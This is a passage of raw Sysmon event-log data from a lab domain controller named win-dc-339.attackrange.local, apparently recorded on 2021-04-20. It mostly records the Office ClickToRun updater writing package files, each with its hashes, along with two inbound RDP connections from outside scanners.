14:55:41.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.AnalysisServices.Common.dllMD5=6F2E82A474160E1C5E1A7F7765B3F2F1,SHA256=AA0AFA7FC20B467DCCADE67CA935DFBFD26B950FB845AA48A923468545A82808,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\adal.dllMD5=DA46703D6C81C9B1480D05040EF4E71F,SHA256=271C8ABE34B5C20B9E03A0C05786FE86E18B3796D8996B8CA0CBB6FDF150B319,IMPHASH=156376CD4AA37B013970ABB5D0F9297Dtruetrue 23542300x800000000000000070893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Resources\1033\msmdsrvi_xl.rllMD5=809D3A31CEF7C578470DC942D092E685,SHA256=5E088372E89E8F281514FD80AC438E14ECDDC72985741F39362A5A758021C22F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\trdtv2r41.xslMD5=AFEBC8CDAFB90959800184887DC7F1AC,SHA256=C196C51D3A2D29369D24AFA80531ECAAE652C079E1A2B3F67247D90A9B92CFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sybase.xslMD5=A16E716031AC4E6BDBD6F35A5AF6CB98,SHA256=A3CD6B7BFE0FF5CD9AFDAA2EEBB221A46E753EBF5EF410B65A14AE866E3D2AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sqlpdw.xslMD5=8A573404F2B93CF45F19C5DB5CEA8230,SHA256=1389EDB75CFB19FB9D1C86ABFD9FEE7F69B5A46E5FF1ADCF6BE5F8E017669142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql90.xslMD5=00AB2E6AF317B027233584CA05B0AF78,SHA256=E0E9D0B9A0F40B597CC6381BF1EC8337E1DEB4CD6A121DF26816C508F85A4760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xslMD5=677C55508FD93BFE1011659B6B85B17C,SHA256=4009EDE1F98F1AB1578C427F3CCB2C3259192A3A1AF14276B16C4448240A7C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql2000.xslMD5=3D6DBDBCC35A81D0FB9FC99B3B09D3A5,SHA256=C79059B62CBC069F855D5DA1E3CC8EBCFD1D20F2A3FCF4E7C089985E19B88097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\orcl7.xslMD5=3053094B1445D6C292CC925F1B2E8506,SHA256=509A7E04DC2BB81FF781315AB182A738FFAB8AF059BD267D1D4B24A7498DB318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\msjet.xslMD5=231AAB1CFA3C63327AD073DBB3D4371C,SHA256=CC200681625401A916F79EDA7BB6A179EE4BDE670A4AAD80FCB9C1167493EF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\informix.xslMD5=F7380302CE9306A970E8602D74173066,SHA256=44BEF02DABBD62124A6310C2E73177F4ADFF4EABC6A10A4A73D3E0CF9BE55114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\db2v0801.xslMD5=FE2B9A3979B7882D55A92B06E2EBE4AD,SHA256=C686C484CE89B8E05575F70334E2B563B54A094708F4F4F79BA215C67EE07EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as90.xslMD5=4B56DB7920F1DBD4ABC838AE3DB5B715,SHA256=521B163EADDB0EFBD741ABF553CB812594865EE0657AF9DFCD672DCA09BAB529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xslMD5=3F180E80B895CF04EC5E99DD7B63445E,SHA256=CFD3F8C4BAA855CEB0E45C3254B2975EFD43498226844C5D5765041AEF89B52A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODFMD5=490D037515B392F9B89AE90C00F9419E,SHA256=2368B959B20A5B6CA19DD4C791AC0869BA800DEFABF9BB03ADF03BD73BA75014,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\xlsrvintl.dllMD5=2E0ABA76345266F47184A0EEC7486826,SHA256=D6EB3F232C4DAFC8F6B4248A26682CC401389C788D495E948DE1C5658E97CCC4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\README.HTMMD5=2DCE97A47186582DB5B0570E50A68FCF,SHA256=AE621361A77E30152EF836AE1CF68ACBB211E62D03D74ADF7877D0EA861C441E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmia64.msiMD5=DDCC193CAD800F4E19CE830EE88606AC,SHA256=EB288561E6EFDF22DE41EEF7243FC93AC40BCD103248754089FF64C8D6189BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmia32.msiMD5=DA16B736A68EBE1A9E1F0D0AF16215B8,SHA256=9E1027FA442885690E52DA93248E5B26E46F1CA81726D5C217AD6AAD6DE8E3A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.171{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49514-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000070874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:40.107{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52167-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msiMD5=C5FD589D4AEADF10C7880731115F92E4,SHA256=D861F354C923D15AE4636485802CBC760F5CA59EB02194B83CCF1DB2C4EA6B99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp32.msiMD5=BADD52B58816C7061B8EE827449CE8D4,SHA256=75B56C97330EE2AC68ABCFBBABAFA02F61CDB591496F6E97D7527701C82774B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\OSFINTL.DLLMD5=241888D6DB0C945531D29BB6CE89531C,SHA256=EB6CD0147C5569A3B02C549E824E825CCF07B9EABF12F0C7C3663BD77C41A8D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLLMD5=F926A81D844CC75302D50DF40FB398D7,SHA256=1A41ADAC802B74B708857A9C3E2C2E50ADEF59849C25B7F23820773F8916DDDF,IMPHASH=31BCBD80AFE6E497045844053D47B8F2truetrue 23542300x800000000000000070869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\msointl30.dllMD5=AC9873C222D08B38C8CFC6049B7DADB0,SHA256=095AA0B8EF4E79ECFD40858CCF35727877E6E212C3DF666FD7555F750E4AE733,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSOINTL.DLLMD5=6C2D7B27FD3EAE5B756E8E0D5F3AE84F,SHA256=64C121B4C21E06FBC486DA9EEC82682632E1F239F1BFDBDB11E5F1767A678193,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ALRTINTL.DLLMD5=8899E7B9A535787FB16CE1E46A96E0FE,SHA256=639AE4CC49B0B373E4D57F9338D5002BBBB3F02E4EDEF79D9E765F1209AB304C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ADO210.CHMMD5=07F24DA6C320AB7B6DFE820FB68B676A,SHA256=B8D6E8020044E60B44C22C45D64B6C9EE13606C612EA0DA946EE05D0D01E4B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLLMD5=F990511FF9AE9700464E04F52C237747,SHA256=A00963D6C522470AF7E75702BF896D7D5E0E792E3D872CAB8F4BF4AEC029F284,IMPHASH=240EC1D5B8ABBAEFA739937449BA77FBtruetrue 23542300x800000000000000070864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLLMD5=4974F4574758DBDDA6061443EFE96386,SHA256=E30A71A5E2EE5BFE957ECCB8DB641D13A9523D6DCDFA28FE71F9EAB818E2CD30,IMPHASH=D6158AA25A9B2A4B3831EEA238928506truetrue 23542300x800000000000000070863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEINTL.DLLMD5=7FEB07686FF065C4DE2843F6E3B9FFF8,SHA256=135371085FC13CEBD137F0C3288529B0E3300201563C1060E66F21B843A3FF54,IMPHASH=7A6DB5CC1F41833388A81BA889517C71truetrue 23542300x800000000000000070862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\MSClientDataMgr\MSCDM.DLLMD5=33C00EDD03E673D7A678CA8CFE8311E8,SHA256=1ED3BD3698D9D6B19655A8080A7895F62C28102DA34BD7B60471C87849CCF1B7,IMPHASH=3DE87FDA00BC87DFD2F40AD0F5F4F934truetrue 23542300x800000000000000070861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\NamedUrls.HxKMD5=67D7183CF742812FE8F2466EEBDB114C,SHA256=7AC8AE8FBF69E7DCBA2DFC3B74C7F1EA9CA1FE85B73D0C096B8CF5D80E036931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\msitss55.dllMD5=D00986BB740317E57D52B5B2F6FFA7B4,SHA256=02ED1B846B053CABFBF1CAEC992C86D1583AC298BC909BB10CA132FD9968F868,IMPHASH=6C2819E0EA4691156EFC90D36753C56Ftruetrue 23542300x800000000000000070859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxKMD5=9543C1E9A5D5F39BCFBEBE1A07B76826,SHA256=ECAA81FF698AF2F4D795128D0D218B4171A69CC0C6A9BDCF52C92E0FC2454AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\itircl55.dllMD5=C52C74D40AB25EC70647C756F6026573,SHA256=0239DD8EF4D58B67C93AD0C613D71986027AE7BCFDE11424AB9D86E644A18DD7,IMPHASH=79E92BA277859418EAEDF11DE33215B6truetrue 23542300x800000000000000070857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\HxRuntime.HxSMD5=382C886FD239F3DF7E8B8D6958DF8F2C,SHA256=FE9702B0EC12B5D86A079F753C9E9CFE29F30714C34EB38904EA3D6A27A60961,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\hxds.dllMD5=E8624E5E5626D8E81BE3FD87C75DC82A,SHA256=8B6FEB51FB46405CB4AE16FCC41F13BE7D1668D151654C6C4EDDC6002CDFBC53,IMPHASH=F5A65CD6A5253F473B3550D480723AF3truetrue 23542300x800000000000000070855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Hx.HxTMD5=868DEC059E20C7F28BA2805E6B047E44,SHA256=137BF5EC736BD430929690AFC8FC92E999C8CFE08A4235D599CD1FDEC9075762,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Hx.HxCMD5=FC6F9E1FD2CD944DFFD548BAE8AB2FC3,SHA256=24F3D1D585A06151DDACBFB1EE9512F554348D1E2BD8F8E3BD1BCE3F0501F919,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft 